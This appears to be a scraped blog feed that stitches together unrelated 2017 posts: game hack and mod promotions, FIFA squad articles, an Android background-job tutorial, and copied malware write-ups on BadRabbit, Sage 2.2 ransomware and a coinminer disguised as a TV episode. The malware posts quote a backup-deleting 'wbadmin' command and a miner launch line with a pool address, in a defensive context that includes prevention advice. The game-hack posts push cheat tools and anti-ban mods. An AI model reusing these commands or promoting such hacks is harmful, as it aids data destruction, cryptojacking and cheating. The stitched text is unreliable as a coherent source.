Monday, 30 October 2017

Riptide GP 2 MOD BY GAME KILLER

Reptid GP 2 Mod By Game Killer

👇FEATURES OF THIS HACK👇

(1) UNLIMITED CASH

(2) ALL JETS UNLOCK

(3) UPDATED VERSION

(4) *NO ROOT*

(5) GAME KILLER MOD ENABLE

To Luarn How To Hack Any Games Subscribe Hack Now Channel

Shadow Fight 2 Mod By Game Killer

Shadow Fight Mod By Game Killer

👇FEATURES OF THIS HACK👇

(1) UNLIMITED GEMS

(2) UNLIMITED GOLDS

(3) UPDATED VERSION

(4) *NO ROOT*

(5) GAME KILLER MOD ENABLE

To Luarn How To Hack Any Games Subscribe Hack Now Channel

Saturday, 28 October 2017

Fifa puskas award 2017 | All Nominees | winner | official award by Fifa ...

Olivier Giroud’s superb ‘scorpion kick’ was voted by fans around the globe as the best goal of 2016-17, succeeding Mohd Faiz Subri as this year’s FIFA Puskás Award winner. His brilliantly improvised finish, scored against Crystal Palace in the English Premier League on 1 January 2017, completed a swift counter attack by Arsenal. Alexis Sanchez curled in a cross from outside the penalty area on the left wing for the Frenchman, whose audacious, acrobatic effort crashed in off the crossbar before bulging the inside of the Palace net.

Giroud's stunning 'scorpion-kick' scored against Crystal Palace in January beat off competition from Venezuela's Deyna Castellanos and South African goalkeeper Oscarine Masuluke.

The Frenchman's effort, a flicked volley with his left foot that flew in off the crossbar in 2-0 win, was announced as the winner at a ceremony held at the London Palladium on Monday.

The 31-year-old took to the stage in a navy tuxedo, white shirt and bow tie to collect his award. He said: “Thank you very much. It’s an honour for me and I’m delighted to receive this trophy in front of legends of football.

“I would like to thank thank the people who have voted for me, and congratulate the other nominees who scored amazing goals too. And i would like to thank my teammates, without them I couldn’t score this goal.

“And my family, and my children who are watching on tv right now. I would also like to dedicate this trophy to my Dad.”

The striker has scored four goals for club and country this season and shared his joy at the accolade with the following video on social media. His club were also quick to congratulate him on the achievement.

Cristiano Ronaldo took home the men's individual award for the second consecutive year, ahead of Lionel Messi and Neymar Jr.

Although there was a trophy for a Barcelona player, with Lieke Martens taking home the Best Women’s Player trophy over Carli Lloyd and Deyna Castellanos.

Away from the glitz and glam, Fifa gave the Fair play award to Francis Kone who saved the life of an opponents who had swallowed his tongue after colliding with the opposition goalkeeper.

Arsenal's next Premier League game is against Swansea City on Saturday afternoon.

=================

Watch Fifa world cup 2018 russia stadiums | arenas | host cities

here :

https://www.youtube.com/watch?v=0rHwg02B93E

==============

stay with us by subscribing us at

you tube : https://www.youtube.com/knowledgetube

our Facebook page : https://www.facebook.com/Ktube24 (like it please)

=================

Thursday, 26 October 2017

Last Day on Earth mod v1.6.5 By Game Killer

Last Day on Earth Mod v1.6.5 By Game Killer

👇FEATURES OF THIS HACK👇

(1) UNLIMITED MONEY

(2) UNLIMITED HEALTH

(3) UPDATED VERSION

(4) NO ROOT

(5) Game Killer MOD ENABLE

FRIENDS MY ALL MODS ARE FREE SO PLEASE SUPPORT MY CHANNEL AND HELP ME TO GET 100 SUBSCRIBERS

To Luarn How To Hack Any Games Subscribe Hack Now Channel

Wednesday, 25 October 2017

Comparing EternalPetya and BadRabbit

I've created a table comparing the EternalPetya (ExPetr, NotPetya, etc.) outbreak from June, and the BadRabbit ransomware outbreak from yesterday (2017-10-24).

I have decided to not include WannaCry (WanaCrypt0r), as they are not related, while EternalPetya and BadRabbit do seem very closely related, or even developed by (a part of) the same people.

Use freely, as long as you include a link to the original source, which is this blog post.

Comparison table (click to enlarge)

Download the table / comparison sheet

Additionally, you may find this image as a handy spreadsheet (which you can also download in several formats) on Google Docs here:
EternalPetya_BadRabbit_Comparison

Note: this table or sheet will be updated continuously.

Purpose of BadRabbit?

Again, this makes you wonder about the actual purpose of ransomware, which you can read more about here: The purpose of ransomware

For BadRabbit in particular, it may be deployed as a cover-up or smokescreen, or for both disruption and extortion.

Prevention

As for any prevention advise, have a look at the following page I've set up:
Ransomware prevention

Disinfection and decryption

Unfortunately, decryption is likely not possible without the cybercriminal's private key.

You may be able to restore the MBR, or your files, if you catch the ransomware in the act, and shutdown the machine at that point. Reboot in safe mode and copy over or back-up your files.

Then, Restore the MBR, and reinstall Windows.

You may also try to restore the MBR first, and consequently attempt to restore files using Shadow Volume Copies. For example, a tool such as Shadow Explorer can be of assistance, or read the tutorial here.

If that doesn't work either, you may try using a data recovery program such as PhotoRec or Recuva

Any questions, comments or feedback, please do let me know in the comments section below, or send me a message on Twitter. See also my About me page for other contact details.

Monday, 23 October 2017

Best Browser Ever By Game Killer

Turbo Browser By Game Killer

SCREEN SHOTS

👇FEATURES👇

(1) BEST BROWSE EVER

(2) FAST DOWNLOADING

(3) SIZE ONLY 15 mb

(4) NEWS

(5) SPORTS

(6) HEALTH

(7) ETC...

(8) DOWNLOAD NOW FOR FREE

Germany football team Fifa world cup 2018 Russia (official ) - qualifier...

Germany football team Fifa world cup 2018 Russia (official ) - qualifier fifa world cup 2018 [HD]

Why this formation ?

This variation offers a mixture of youth and experience. Dortmund's Maximilian Philipp will be pushing for higher honours soon, while Sandro Wagner will also be hoping for a place on the plane.

There was no real need to scrape the barrel for the fourth variation – wait until you see the list of absentees! Matthias Ginter stands as the sole survivor from 2014, but every single one of these players has represented their country at either senior or U-21 level.

Germany’s defensive strength in depth is underlined in the final line-up: two of the Bundesliga’s most reliable centre-backs, Willi Orban and Ginter, only appear on the periphery of Löw’s thinking, although both will no doubt fancy their chances of a spot on the plane to Russia if they continue their barnstorming form.

Ginter, in particular, looks to have benefited from his summer move to Gladbach and is back to his best thanks to playing more regular football.

A youthful, well-balanced midfield comprises Kerem Demirbay and Mahmoud Dahoud, whose fine start to life at Dortmund means he will surely be pushing for a first cap sooner, rather than later.

Another youngster to have had a fine start to life in Dortmund is Maximilian Philipp: if he continues his rich goalscoring form, he’ll be pushing for Reus’ place in Löw’s first-choice XI. Although the Germany coach is not a natural risk-taker, he has always been willing to reward players impressing domestically, and the 23-year-old is doing just that this season, having scored four goals already.

Up top, Wagner's wonderful goal against Northern Ireland pointed to his qualities: the Hoffenheim striker, who won the European Under-21 Championship back in 2009, has experienced a renaissance in the Bundesliga, giving him a new lease on life on the international circuit. Although 29, four goals in as many international games is an outstanding record.

Extra :

There’s still a year to go until Joachim Löw has to consider making a final cut for his 23-man World Cup squad, but the array of talent he has at his disposal is enviable to say the very least.

Just take a look at this list of absentees:

Goalkeepers: Oliver Baumann (Hoffenheim), Ralf Fährmann (Schalke), Timo Horn (Cologne)

Defenders: Sven Bender (Leverkusen), Thilo Kehrer (Schalke), Lukas Klostermann (Leipzig), Marcel Schmelzer (Dortmund)

Midfielders: Nadiem Amiri (Hoffenheim), Maximilian Arnold (Wolfsburg), Karim Bellarabi (Leverkusen), Diego Demme (Leipzig), Daniel Didavi (Wolfsburg), Kai Havertz (Leverkusen), Christoph Kramer (Gladbach), Max Meyer (Schalke)

Forwards: Max Kruse (Werder Bremen), Andre Schürrle (Dortmund), Mark Uth (Hoffenheim)

==========

=================

Watch Fifa world cup 2018 russia stadiums | arenas | host cities

here :

https://www.youtube.com/watch?v=0rHwg02B93E

==============

stay with us by subscribing us at

you tube : https://www.youtube.com/knowledgetube

our Facebook page : https://www.facebook.com/Ktube24 (like it please)

=================

Schedule Android Background Job Using Firebase JobDispatcher

From Android version 8.0 (Oreo) on wards there are limitations in executing background services and there are some limitations in receiving certain broadcasts. The android team implement all these restrictions to improve app performance and device battery life. If your app target API 26 then you have to consider some other mechanisms to do your background job.

Fortunately there is JobScheduler API that solve the problem regarding the background job limitations in newer versions of android. Google suggests Android App developers to use the JobScheduler API for their background job execution rather than using a background service.

But the problem is that the android framework JobScheduler API is available from android API version 21(Lollipop) and above. If your app support start from Lollipop and above then you can go for the framework JobScheduler API for your background job.

If your App support start from android API lower than 21 then you can use the Firebase JobDispatcher for performing your background operations.

Firebase JobDispatcher API is available from Android API 9 and above.
It uses the Android framework Job Scheduler API features for its operations.
It needs google play service installed in the device.

So here we are going to create an Android example of how to use firebase JobDispatcher in your android application.

Step 1:

Add the latest dependency for using firebase JobDispatcher in your android application. Open your android studio project module level gradle file and add the following dependency in the dependencies section.

"compile 'com.firebase:firebase-jobdispatcher:0.8.4'"

You can check here for the latest dependency.

Step 2 :

Implement the job service class for defining your job. Create a new java class that extends JobService and implement the needed methods.

Here is the implementation of Firebase JobDispatcher JobService.

public class MyService  extends JobService{

    BackgroundTask backgroundTask;

    @Override
    public boolean onStartJob(final JobParameters job) {

        backgroundTask = new BackgroundTask()
        {
            @Override
            protected void onPostExecute(String s) {
                Toast.makeText(getApplicationContext(),"Message from Background Task :"+s,Toast.LENGTH_LONG).show();
                jobFinished(job,false);
            }
        };

        backgroundTask.execute();
        return true;
    }



    @Override
    public boolean onStopJob(JobParameters job) {
        return true;
    }


    public static class BackgroundTask extends AsyncTask<Void,Void,String>
    {

        @Override
        protected String doInBackground(Void... voids) {
            return "Hello from background job";
        }
    }


}

In JobService class you need to implement two methods, onStartJob and onStopJob.

You have to place your job within the onStartJob method. The job service is executed on the main process thread, so if your job is a time taking one ( for example download a large file from server), then you have to run the job on a separate thread, otherwise the system may issue an Application Not Responding dialog.

In the above example i uses an AsyncTask for performing the background task. The AyncTask has a separate worker thread for the job.

Ads By Google

The return type of the onStartJob is a boolean.
If you use a separate background thread for the job execution, then you have to return true from the onStartJob method.
If you return true then you must call the method jobFinished() soon after the job finishes.
jobFinished method needs two parameters, Job parameters and a boolean value.
If you want to reschedule the same job again, then you can pass true as second parameter.
If you forget to call the jobFinished() method, then the system assume that your job is still running in the background and that cause the JobService to run without any task and that leads faster battery drain.
If the task interrupted before finish, then the system call the onStopJob() method. You can clear all the unfinished job resources from here. If you want to reschedule the interrupted job again then you have to return true from this method.

Step 3 :
Register the Job Service in Manifest file. Open your application AndroidManifest.xml file and add the following code in the application tag.

  <service android:name=".MyService">
            <intent-filter>
                <action android:name="com.firebase.jobdispatcher.ACTION_EXECUTE"></action>
            </intent-filter>
        </service>

Job service is ready and now you can schedule the job.

Step 4 :
Start (Schedule) the job.
Here is the code segment that schedule the job.

 public void startJob(View view)
    {
        String Job_Tag = "my_job_tag";
        FirebaseJobDispatcher jobDispatcher = new FirebaseJobDispatcher(new GooglePlayDriver(this));
        Job job = jobDispatcher.newJobBuilder().
                   setService(MyService.class).
                   setLifetime(Lifetime.FOREVER).
                   setRecurring(true).
                   setTag(Job_Tag).
                   setTrigger(Trigger.executionWindow(10,15)).
                   setRetryStrategy(RetryStrategy.DEFAULT_EXPONENTIAL).
                   setReplaceCurrent(false).
                   setConstraints(Constraint.ON_ANY_NETWORK)
                   .build();
        jobDispatcher.mustSchedule(job);
        Toast.makeText(this,"Job Scheduled..",Toast.LENGTH_SHORT).show();

    }

To schedule a job first you have to create an object of FirebaseJobDispatcher class.
You have to pass the GooglePlayDriver object to the constructor of FirebaseJobDispatcher.
You can create Job class object by calling the build method on JobBuilder.
The job parameters are specified on the JobBuilder object. You can get the JobBuilder object by calling the newJobBuilder method using the FirebaseJobDispatcher object.
setService() : Through this method you can specify the Job Service class in which you place your job.
setLifeTime(): Specify the life span of the job. Default value is Lifetime.UNTIL_NEXT_BOOT
setRecurring() : Specify whether the job repeat or not.
setTag() : Help the system to uniquely identify the job using its tag.
setTrigger() : Specify the job start time an repeating interval.
setRetryStratergy() : Specify retry with exponential back off
setReplaceCurrent() : Specify whether or not replace the job having same tag.
setConstraint() : Specify the job requirements. For example Constraint.ON_ANY_NETWORK (Run on any network), Constraint.DEVICE_CHARGING(Only run when device is charging) etc.
Finally you can schedule the job by passing the job as a parameter to the mustSchedule method.
You can call the mustSchedule method on the JobDispatcher object.

Cancelling A Job :

To cancel a particular job call the dispatcher.cancel('job Tag') method.
To cancel all the jobs call dispatcher.cancelAll() method.

Conclusion:

Firebase job dispatcher is the best choice for running background task in your android application from Android API version 9 and above. I hope you understand all the concepts.

Sunday, 22 October 2017

Plant vs Zombie 2 Mod For all Versions By Game Killer

Plant vs Zombie 2 Mod By Game Killer

👇FEATURES OF THIS HACK👇

(1) UNLIMITED GOLD

(2) UNLIMITED GEMS

(3) ALL PLANTS UNLOCKED

(4) NO ROOT

(5) Game Killer MOD ENABLE

👉How To Used👈

DOWNLOAD THE SAVE DATA AND THEN EXTRACTE IT THEN YOU CAN GET A FOLDER CALLED [PLANT VS ZOMBIE MOD BY GK] INSIDE THE FOLDER YOU CAN GET MAIN FOLDER CALLED [com.ea.game.pvz2_row] THEN COPY THE FOLDER AND PEST IN Android/data FOLDER AND THEN ENJOY THE UNLIMITED HACK

To Luarn How To Hack Any Games Subscribe Hack Now Channel

8 Ball Pool Mod v3.11.2 By Game Killer

👇FEATURES OF THIS HACK👇

(1) UNLIMITED HEALTH

(2) ANT BAN FOR 1 week

(3) UPDATED VERSION

(4) NO ROOT

(5) Game Killer MOD ENABLE

To Luarn How To Hack Any Games Subscribe Hack Now Channel

Friday, 20 October 2017

Argentina football team Fifa world cup 2018 Russia (official ) - qualifi...

Picking Argentina's 2018 World Cup Squad After Latest International Games

Goalkeepers

Sergio Romero is the established No. 1 and will continue to be so for the 2018 qualification period and finals, by the end of which he'll be approaching or possibly just past a century of caps for the national team...which isn't bad, considering he's only a back-up at club level.

Nahuel Guzman is the usual deputy, and the UANL stopper should go as No. 2, with his CONCACAF Champions League performances adding experience to his armoury.

Third, and showing a little faith here, we're opting for Geronimo Rulli.

In truth the 24-year-old is uncapped for a reason: Although he's tremendously athletic, has great reflexes and has a big reputation, his mistakes are costly and frequent, and his judgement is still lacking. Even so, playing three successive seasons in La Liga will continue to refine his game, and he's still the most likely heir to Romero's spot—and the only goalkeeper in consideration under 30 years of age

Full-Backs

Four full-backs for Argentina, boasting plenty of experience between them...if not quite as much offensive class and exciting thrust as some of the real challengers for the World Cup have in their own squads.

Pablo Zabaleta will still be around and in place on the right, and he'll be challenged for the spot by Sevilla's Gabriel Mercado. Aggressive, taller than Zabaleta and two years younger, it could well be that Mercado is the starter on that side of defence.

On the left, expect Marcos Rojo to line up even though it's clearly not his favoured position. He still has the aggression to lock down that side of defence, has reasonable recovery pace and won't be shy about trying to get forward in support, but his overall game is certainly a level lower when on the side of defence compared to in the middle.

Challenging Rojo for left-back—or standing in for him when suspended, perhaps—we're going for Emmanuel Mas, currently with Trabzonspor and who has played his part in the qualifiers so far.

Centre-Backs

Argentina have habitually had a couple of decent centre-backs to pick from, but pairing them up for any length of time seems to have been a real problem over the last few tournaments.

We're anticipating Nicolas Otamendi recovers enough form to take his place as the defensive leader; aggressive on the front foot and covered in beard, shouting positional instructions he's all too keen to ignore himself when there's a challenge to be made outside the box.

Alongside him, it's a little bit take-your-pick.

Everton's Ramiro Funes Mori is our best guess to start the tournament in the back four, but it may well come down to form or simply finding the winning partnership. Who complements Otamendi best, dropping in behind and sweeping up the loose balls.

If it were down to pure quality, Mateo Musacchio would be in the XI, but injuries have taken 20 or 30 caps off him already, and the Villarreal man still has a lot to prove at this level.

Fourth choice will be Facundo Roncaglia, but it comes with a caveat: Ezequiel Garay hasn't played for Argentina for two years, but if he finds form and shines for Valencia, he could well make a crashing late entrance not just to the squad, but to partner Otamendi.

Midfielders

Six midfielders for Argentina, starting with the immovable rock, the must-have, the organiser, the protector and no doubt at times the last-ditch saviour: Javier Mascherano.

A centre-back at club level, Mascherano nonetheless reprises his defensive-midfield role on the international stage and remains one of the world's finest, with his unstoppable will to win and non-stop aggression setting the tone for the rest of the team to match.

Alongside him in the middle there will be one of three, each capable of working hard defensively but also being the metronomic distributor from the centre circle and from higher upfield: Lucas Biglia, Ever Banegaand Augusto Fernandez.

Depending on how Argentina line up—Bauza has used both 4-3-3 and 4-4-2 variations, with wide, high, inside forwards in the latter—there could be different roles for Angel Di Maria, but he'll certainly be in the XI either way.

And, finally, we opt for the wiles and too-often-hidden genius of Javier Pastore to convince the boss he's worth a plane ticket.

Forwards

First and foremost, suspended or not, Lionel Messi is in.

Then there will be the out-and-out strikers, and with no Maurco Icardi in sight it's the usual duo of Gonzalo Higuain and Sergio Aguero who will be travelling. Both have played from time to time, either when Messi doesn't or with one deeper than the other through the middle and Messi wide, but more often than not we'd expect one to start, one on the bench.

If Messi's absence during qualification teaches Argentina one important lesson, it could well be that Paulo Dybala is going to be almost as important over the next decade. One or two big performances from him in the blue and white and he'll be a cert for the squad, and maybe a consideration to start.

Then it's the big decision over which players will offer most either as wide starters, or off the bench as impact subs. The experience of Nico Gaitanremains, and we're betting that a club team-mate at Atletico Madrid really steps up a level over the next 12 months, meaning Angel Correa takes the final place in our squad.

Argentina's 23 is, once again, a group that gets markedly stronger as it moves upfield, but there's certainly enough quality there to be confident of reaching the latter stages once more.

Are there the match-winners to go all the way this time? Can they end the run of being losing finalists year after year? It's a tough ask, but with Messi anything is possible—now all they have to do is qualify without him.

Missed the Plane

Naturally, where 23 are happy, a further group will be inherently disappointed to miss out, and we've got seven such names to frustrate.

Goalkeeper Mariano Andujar has been a squad regular, but aged 35 by the time the World Cup finishes and only having played once in the last two years at international level, he's not going to add enough. He stays at home.

Similarly, Martin Demichelis cannot be included merely for experience when four of the squad's defenders will already be in their 30s. Lacking pace and unlikely to feature after the finals, it's time for the former Bayern Munich and Manchester City man to step aside.

In midfield it's a blow for La Liga men who simply won't see enough game time: Matias Kranevitter has yet to impress consistently since moving to Atletico Madrid, including on loan at Sevilla this term, while Enzo Perezcaptains Valencia but misses out with frequency to injury or suspension. With another rebuild on the cards this summer for Los Che, we're betting Perez is too inconsistent to make the cut.

Further forward, Erik Lamela has been a big part of Argentina's squad in the last year or two, but there's such competition in the final third that when push comes to shove, we'd leave him aside.

Ezequiel Lavezzi is ageing, unimpressive and unnecessary in the squad, and while we can find very little fault with Mauro Icardi and his game at Inter Milan, he simply doesn't seem fancied by the Argentina management. We can't, therefore, predict he'll be on the plane.

Sunday, 15 October 2017

Mini Military Rapid Fire Mod by Game Killer

👇FEATURES OF THIS HACK👇

(1) UNLIMITED HEALTH

(2) RAPID FIRE

(3) 7X ZOOM FOR ALL GUNS

(4) PRO MOD UNLOCK

(5) UNLIMITED GAS BOMB AND TIME BOMB

(6) NO ROOT

(7) Game Killer MOD ENABLE

To Luarn How To Hack Any Games Subscribe Hack Now Channel

Last Day on Earth Mod v1.6.4 by GAME KILLER

Last Day on Earth Mod by Game Killer

👇FEATURES OF THIS HACK👇

(1) UNLIMITED HEALTH

(2) UNLIMITED MONEY

(3) ALL EQUIPMENT UNLOCK

(4) UPDATED VERSION 1.6.4

(5) NO ROOT

(6) Game Killer MOD ENABLE

To Luarn How To Hack Any Games Subscribe Hack Now Channel

Saturday, 14 October 2017

Notes on Sage 2.2 ransomware version

Sage, also known as SageCrypt, is an interesting ransomware variant - emerged somewhere in December last year, and is believed to be a variant of the CryLocker ransomware.

There's a good blog post on BleepingComputer on the first version of Sage, id est "Sage 2".

Yesterday, a personal friend of mine reached out, as his "computer started talking" and his files appeared to be encrypted. And indeed, it appears he suffered the latest variant of Sage: Sage 2.2

Sage 2.2 appears to have been out for a while, at least since February of this year:

Sage 2.2 sample (at 11/58): https://t.co/XsWMsPcXsj
From: nrcommerce[.]com/system/config/spam1.exe - that filename... 👏
More samples: pic.twitter.com/a2J157kjJk
— MalwareHunterTeam (@malwrhunterteam) February 21, 2017

Some figures of Sage 2.2 follow below:

Figure 1 - Sage 2.2 desktop background

Figure 2 - Sage 2.2 file recovery instructions

The message reads:

You probably noticed that you can not open your files and that some software stopped working correctly.
This is expected. Your files content is still there, but it was encrypted by "SAGE 2.2 Ransomware".
Your files are not lost, it is possible to revert them back to normal state by decrypting.
The only way you can do that is by getting "SAGE Decrypter" software and your personal decryption key.

Typical features of Sage 2.2, include, but are not limited to:

Refresh or update of payment pages is possible;
Ransom note (!HELP_SOS) and portal, including CAPTCHA;

And...

It speaks! Just like Cerber did at some point, Sage 2.2 has a message for the victim using Microsoft SAPI:

Figure 3 - VBscript which will speak to the victim (click to enlarge)

Interestingly enough, even though the version number still indicates 2.2, there's at least one slight change:

Deletion or purge of backup catalog/history by using:
wbadmin delete catalog -quiet

The portal or decryption pages look as follows, stepping through:

Figure 4 - Sage 2.2 user login portal

Figure 5 - Captcha

Figure 6 - Language selection

Figure 7 - Final portal

The victim can choose from a multitude of languages, and, at the final portal, there is a special price for the decryption, for a selected time (7 days): currently 0.17720 BTC, which is about $1000.

As usual, there's a Payment, Test decryption, Instructions, and even a Support tab:

Figure 8 - Payment tab

Figure 9 - Test Decryption tab

Figure 10 - Instructions tab

Figure 11 - Support requests tab

Sage 2.2 will append the .sage extension to encrypted files and currently, it does not appear files can be decrypted without the cybercriminal's help.

As always, try to restore from a backup if possible, and avoid paying the ransom.

Additionally, have a look at my ransomware prevention page, on how to protect yourself.

IOCs

Friday, 13 October 2017

Trainer The Evil Within 2

------------------------DONLOAD

--------------------------DONLOAD

-------------------------DONLOAD

Thursday, 12 October 2017

Trainer Pro Evolution Soccer 2018

------------------------DONLOAD

--------------------------DONLOAD

-------------------------DONLOAD

Wednesday, 11 October 2017

Rick and Morty episode? Nope, another CoinMiner

Last week I got an email from someone requesting help in regards to a possible malware infection: that person downloaded a torrent, and believed it was a legitimate episode of Rick and Morty, an animated series.

A file called Rick.and.Morty.S03E10.HDTV.x264-BATV.MKV.exe (116 MB in filesize) is of our interest and, what you'll notice first is of course the file extension - it's an executable Riiiiiiiiiiiick!

In fact, this file is a self-extracting and password-protected archive which contains two other files:

Figure 1 - two new files in the archive

One file is indeed a legitimate video file, which features the following:

Figure 2 - clip

This short clip has nothing to do with Rick and Morty, but seems to be a promo clip for a new series, called '1922'.

Inside the other file however, another executable, is another self-extracting and password-protected archive, sometimes referred to as 'SFX' with inside ... More archives.

In short, what you actually end up with is a cryptominer or coinminer. In Figure 3 below, you can spot both the passwords used for the archives, as well as the mining pool of interest:

Figure 3 - Passwords, and cryptominer pool (click to enlarge)

The line of interest is as follows, in where the IP points to a US server:

START "{1}" /B /WAIT /LOW "%ALLUSERSPROFILE%\{1}\{1}.exe" -o 173.44.42.189:8080 -u off.x -p off.x -k --nicehash -o us-east.cryptonight-hub.miningpoolhub.com:17024 -u off.y -p off.y -k -v 0 --donate-level 1 -B

Basically, this is yet another cryptominer or coinminer. This one is rather interesting, for several reasons. If you'd like to know more, feel free to have a play around with the files, they are included as IOCs at the end of this post.

Disinfection

If you've been hit by this, then...:

Navigate to C:\ProgramData or %ALLUSERSPROFILE%
Search for a folder with random names. If you don't see any, you may want to follow the instructions here. Delete said folder, if possible. If not possible:
Open Task Manager, and search for any process with a random name. End the process and repeat step 1 to 2.
Perform a scan with your installed antivirus product.
Perform a scan with an online antivirus, which is different from the one you have. Alternatively, perform a scan with Malwarebytes.

You may also leave a comment should any difficulties arise.

Prevention

Install an antivirus (free or not).
Enable showing file extensions. This is hidden by default by Windows, and will enable you to see if that 'video' is indeed a video, or not. Guide here.
Do not download any torrents or at least try to avoid those that are either suspicious-looking, or too good to be true.

Conclusion

Coinminers have been on the rise for a while now, and illegitimately use a person's machine for mining, which may additionally lead to an increased (and undesired) CPU usage.

While coinminers for now are relatively less dangerous than what's usually out there, for example banking trojans, it should not be underestimated - and the sample analysed in this post proves the point, as it employed some rather unique, or at least varied, techniques.

It is likely safe to assume that not only the malicious use of coinminers will increase, but also that other malware may jump aboard - attempting to maximize profits (or vice versa, a coinminer with added persistence or other malware on board). The latter has already been observed, for example, in AdylKuzz.

IOCs